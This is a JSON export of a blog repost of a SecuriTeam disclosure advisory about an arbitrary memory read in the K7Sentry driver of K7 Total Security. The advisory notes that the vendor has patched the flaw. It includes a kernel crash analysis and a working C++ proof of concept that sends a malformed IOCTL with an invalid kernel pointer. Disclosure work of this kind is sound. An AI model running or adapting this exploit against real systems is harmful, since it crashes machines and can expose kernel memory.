{"id":10045,"date":"2017-10-23T14:19:19","date_gmt":"2017-10-23T22:19:19","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/23\/news-3818\/"},"modified":"2017-10-23T14:19:19","modified_gmt":"2017-10-23T22:19:19","slug":"news-3818","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/23\/news-3818\/","title":{"rendered":"SSD Advisory \u2013 K7 Total Security Device Driver Arbitrary Memory Read"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 23 Oct 2017 10:31:38 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3435\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3435');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an Crash found in K7 Total Security.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> K7 has released patches to address this vulnerability &#8211; K7TotalSecurity version 15.1.0.305<\/p>\n<p><span id=\"more-3435\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> User controlled input to K7Sentry device is not sufficiently sanitized, the user controlled input can be used to compare an arbitrary memory address with a fixed value which in turn can be used to read the content of arbitrary memory.<\/p>\n<p><strong>Crash report<\/strong><br \/> By sending invalid kernel pointer we can crash the K7 Total Security process as shown here: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ee6ae6d1839508112751\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 1: kd&gt; !analyze -v  *******************************************************************************  *                                                                             *  *                        Bugcheck Analysis                                    *  *                                                                             *  *******************************************************************************    PAGE_FAULT_IN_NONPAGED_AREA (50)  Invalid system memory was referenced.  This cannot be protected by try-except,  it must be protected by a Probe.  Typically the address is just plain bad or it  is pointing at freed memory.  Arguments:  Arg1: f8f8f8f8, memory referenced.  Arg2: 00000000, value 0 = read operation, 1 = write operation.  Arg3: 88c93a63, If non-zero, the instruction address which referenced the bad memory  \taddress.  Arg4: 00000002, (reserved)    Debugging Details:  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;    *************************************************************************  ***                                                                   ***  ***                                                                   ***  ***    Your debugger is not using the correct symbols                 ***  ***                                                                   ***  ***    In order for this command to work properly, your symbol path   ***  ***    must point to .pdb files that have full type information.      ***  ***                                                                   ***  ***    Certain .pdb files (such as the public OS symbols) do not      ***  ***    contain the required information.  Contact the group that      ***  ***    provided you with these symbols if you need this command to    ***  ***    work.                                                          ***  ***                                                                   ***  ***    Type referenced: kernel32!pNlsUserInfo                         ***  ***                                                                   ***  *************************************************************************  *************************************************************************  ***                                                                   ***  ***                                                                   ***  ***    Your debugger is not using the correct symbols                 ***  ***                                                                   ***  ***    In order for this command to work properly, your symbol path   ***  ***    must point to .pdb files that have full type information.      ***  ***                                                                   ***  ***    Certain .pdb files (such as the public OS symbols) do not      ***  ***    contain the required information.  Contact the group that      ***  ***    provided you with these symbols if you need this command to    ***  ***    work.                                                          ***  ***                                                                   ***  ***    Type referenced: kernel32!pNlsUserInfo                         ***  ***                                                                   ***  *************************************************************************    READ_ADDRESS:  f8f8f8f8     FAULTING_IP:   K7Sentry+a63  88c93a63 80384b          cmp     byte ptr [eax],4Bh    MM_INTERNAL_CODE:  2    IMAGE_NAME:  K7Sentry.sys    DEBUG_FLR_IMAGE_TIMESTAMP:  54eda273    MODULE_NAME: K7Sentry    FAULTING_MODULE: 88c93000 K7Sentry    DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT    BUGCHECK_STR:  0x50    PROCESS_NAME:  poc.exey_0x950    CURRENT_IRQL:  2    TRAP_FRAME:  9a15ba14 &#8212; (.trap 0xffffffff9a15ba14)  ErrCode = 00000000  eax=f8f8f8f8 ebx=001ffea0 ecx=00000000 edx=001ffe90 esi=9a15bac0 edi=00000010  eip=88c93a63 esp=9a15ba88 ebp=9a15badc iopl=0         nv up ei ng nz na pe nc  cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010386  K7Sentry+0xa63:  88c93a63 80384b          cmp     byte ptr [eax],4Bh         ds:0023:f8f8f8f8=??  Resetting default scope    LAST_CONTROL_TRANSFER:  from 82aebe67 to 82a879d8    STACK_TEXT:    9a15b564 82aebe67 00000003 bf4bd6ad 00000065 nt!RtlpBreakWithStatusInstruction  9a15b5b4 82aec965 00000003 c0603e38 f8f8f8f8 nt!KiBugCheckDebugBreak+0x1c  9a15b978 82a9a9c5 00000050 f8f8f8f8 00000000 nt!KeBugCheck2+0x68b  9a15b9fc 82a4cf98 00000000 f8f8f8f8 00000000 nt!MmAccessFault+0x104  9a15b9fc 88c93a63 00000000 f8f8f8f8 00000000 nt!KiTrap0E+0xdc  WARNING: Stack unwind information not available. Following frames may be wrong.  9a15badc 82a43129 84a6c1f8 84d9fc30 84d9fc30 K7Sentry+0xa63  9a15baf4 82c3b7af 00000000 84d9fc30 84d9fca0 nt!IofCallDriver+0x63  9a15bb14 82c3eafe 84a6c1f8 84cdcd80 00000000 nt!IopSynchronousServiceTail+0x1f8  9a15bbd0 82c85ac2 00000028 84d9fc30 00000000 nt!IopXxxControlFile+0x810  9a15bc04 82a49db6 00000028 00000000 00000000 nt!NtDeviceIoControlFile+0x2a  9a15bc04 76f16c74 00000028 00000000 00000000 nt!KiSystemServicePostCall  001ffdc8 76f1542c 7504ab4d 00000028 00000000 ntdll!KiFastSystemCallRet  001ffdcc 7504ab4d 00000028 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc  001ffe2c 767fbbc5 00000028 9500286b 001ffe90 KERNELBASE!DeviceIoControl+0xf6  001ffe58 00f51e42 00000028 9500286b 001ffe90 kernel32!DeviceIoControlImplementation+0x80  001ffec4 00f57500 00000001 002a31b0 002a32c0 poc!wmain+0xe2 [e:k7_2016k7sentry_0x9500286b_win7_pock7sentry_0x9500286bmain.cpp @ 31]  001fff0c 767fef8c 7ffd7000 001fff58 76f3367a poc!__tmainCRTStartup+0xfe [f:ddvctoolscrtcrtw32startupcrt0.c @ 255]  001fff18 76f3367a 7ffd7000 76ec24f9 00000000 kernel32!BaseThreadInitThunk+0xe  001fff58 76f3364d 00f5757d 7ffd7000 00000000 ntdll!__RtlUserThreadStart+0x70  001fff70 00000000 00f5757d 7ffd7000 00000000 ntdll!_RtlUserThreadStart+0x1b    STACK_COMMAND:  kb    FOLLOWUP_IP:   K7Sentry+a63  88c93a63 80384b          cmp     byte ptr [eax],4Bh<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0192 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The PoC has been tested on Windows 7 x86<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ee6ae6d1845461773164\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #include &lt;Windows.h&gt;  #include &lt;iostream&gt;  using namespace std;    int wmain()  {    \tHANDLE hDevice = CreateFileW(L&#8221;\\\\.\\K7Sentry&#8221;, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);    \tif(hDevice == INVALID_HANDLE_VALUE)  \t{  \t\tcout &lt;&lt; endl &lt;&lt; &#8220;Failed accessing K7Sentry Device Driver. Error: &#8221; &lt;&lt; dec &lt;&lt; GetLastError() &lt;&lt; endl;  \t\tcin.get();  \t    return 0;  \t}    \tBYTE dummyBuf[0x20];  \tmemset(dummyBuf, 0, sizeof(dummyBuf));    \t*(ULONG_PTR*)dummyBuf = 0xF8F8F8F8; \/\/INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.    \tcout &lt;&lt; endl &lt;&lt; &#8220;Sending malformed IOCTL&#8230;&#8221; &lt;&lt; endl;    \tDWORD bytesReturned = 0;    \tDeviceIoControl(hDevice, 0x9500286B, dummyBuf, sizeof(dummyBuf), dummyBuf, sizeof(dummyBuf), &amp;bytesReturned, NULL);    \tcin.get();  \treturn 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ee6ae6d1845461773164-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ee6ae6d1845461773164-30\">30<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-1\"><span class=\"crayon-p\">#include &lt;Windows.h&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-2\"><span class=\"crayon-p\">#include &lt;iostream&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-3\"><span class=\"crayon-e\">using <\/span><span class=\"crayon-t\">namespace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">std<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-5\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">wmain<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-6\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">HANDLE <\/span><span class=\"crayon-v\">hDevice<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CreateFileW<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">L<\/span><span class=\"crayon-s\">&#8220;\\\\.\\K7Sentry&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_READ<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GENERIC_WRITE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FILE_SHARE_READ<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FILE_SHARE_WRITE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OPEN_EXISTING<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-10\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hDevice<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">INVALID_HANDLE_VALUE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-12\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">cout<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Failed accessing K7Sentry Device Driver. Error: &#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dec<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GetLastError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endl<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-13\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">cin<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-14\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">BYTE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x20<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">ULONG_PTR*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xF8F8F8F8<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cout<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Sending malformed IOCTL&#8230;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">endl<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">DWORD <\/span><span class=\"crayon-v\">bytesReturned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-26\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">DeviceIoControl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">hDevice<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x9500286B<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dummyBuf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">bytesReturned<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-28\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">cin<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ee6ae6d1845461773164-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ee6ae6d1845461773164-30\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0044 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3435\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 23 Oct 2017 10:31:38 +0000<\/strong><\/p>\n<p>\ufeffVulnerability Summary The following advisory describes an Crash found in K7 Total Security. Credit An independent security researcher, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor response K7 has released patches to address this vulnerability &#8211; K7TotalSecurity version 15.1.0.305 Vulnerability details User controlled input to K7Sentry device is not sufficiently sanitized, &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3435\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 K7 Total Security Device Driver Arbitrary Memory Read<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12135,10757],"class_list":["post-10045","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10045","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10045"}],"version-history":[{"